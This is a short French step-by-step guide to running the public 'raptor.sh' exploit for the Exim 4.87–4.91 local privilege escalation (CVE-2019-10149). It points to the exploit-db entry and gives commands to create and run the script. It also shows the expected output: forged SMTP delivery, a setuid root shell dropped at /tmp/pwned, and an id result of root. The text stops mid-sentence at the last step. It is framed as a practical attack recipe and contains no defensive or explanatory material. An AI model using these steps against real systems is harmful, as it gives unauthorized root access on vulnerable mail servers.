
Exploit d'élévation de privilèges locale pour Exim 4.87-4.91 (CVE-2019-10149). Déploie un helper shell root setuid via des commandes SMTP forgées, permettant l'élévation de privilèges d'un utilisateur standard à root.
Cr.Exim 4.87 - 4.91 - Élévation locale de privilèges
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.Cette méthode nécessite d'abord d'accéder à la machine cible avec des privilèges d'utilisateur standard.
#2.Une fois la machine cible accessible, créez un fichier script avec le contenu suivant :
vi raptor.sh
#3.Copiez le code du fichier 'raptor.sh' fourni. Ensuite, exécutez le fichier à l'aide de la commande :
chmod +x raptor.sh
./raptor.sh
#4.Vous devriez obtenir une sortie similaire à l'exemple ci-dessous :
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.Ensuite, exécutez la commande suivante :
/tmp/pwned
#6.Ensuite, essayez d'exécuter la commande 'id'. Si vous voyez le résultat suivant :
uid=0(root) gid=0(root) groups=0(root),1001(noob)